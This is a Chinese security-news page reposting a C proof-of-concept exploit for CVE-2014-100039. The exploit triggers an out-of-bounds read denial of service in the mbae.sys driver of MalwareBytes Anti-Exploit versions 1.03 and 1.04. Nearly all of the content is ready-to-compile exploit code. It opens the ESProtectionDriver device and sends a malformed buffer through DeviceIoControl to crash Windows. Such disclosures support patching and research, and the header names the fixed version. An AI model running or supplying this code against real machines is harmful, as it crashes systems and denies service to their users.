首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS 来源：@parvezghh 作者：Anwar 发布时间：2015-01-21   /* Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS Date             - 19th January 2015 Discovered by    - Parvez Anwar (@parvezghh) Vendor Homepage  - https://www.malwarebytes.org Tested Version   - 1.03.1.1220, 1.04.1.1012 Driver Version   - no version set - mbae.sys Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB            - http://www.osvdb.org/show/osvdb/114249 CVE ID           - CVE-2014-100039 Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/ Fixed version    - 1.05 Fixed driver ver - no version set */ #include <stdio.h> #include <windows.h> #define BUFSIZE 25 int main(int argc, char *argv[]) {     HANDLE         hDevice;     char           devhandle[MAX_PATH];     DWORD          dwRetBytes = 0;     BYTE           sizebytes[4] = "\xff\xff\xff\x00";       BYTE           *inbuffer;     printf("-------------------------------------------------------------------------------\n");     printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");     printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");     printf("-------------------------------------------------------------------------------\n\n");     sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");     inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);     memset(inbuffer, 0x41, BUFSIZE);     memcpy(inbuffer, sizebytes, sizeof(sizebytes));     printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);     hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);         if(hDevice == INVALID_HANDLE_VALUE)     {         printf("\n[-] Open %s device failed\n\n", devhandle);         return -1;     }     else     {         printf("\n[+] Open %s device successful", devhandle);     }     printf("\n[~] Press any key to DoS . . .");     getch();     DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);     printf("\n[+] DoS buffer sent\n\n");     CloseHandle(hDevice);     return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ManageEngine Multiple Products ·OS X 10.10 IOKit IntelAccelera ·Sim Editor 6.6 - Stack Based B ·OS X networkd "effective_audit ·Samsung SmartViewer BackupToAv ·OS X 10.9.5 IOKit IntelAcceler ·D-Link DSL-2730B Modem - XSS I ·Microsoft Windows NtApphelpCac ·D-Link DSL-2730B Modem - XSS I ·GetGo Download Manager HTTP Re ·Palringo 2.8.1 - Stack Buffer ·Exif Pilot 4.7.2 Buffer Overfl   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved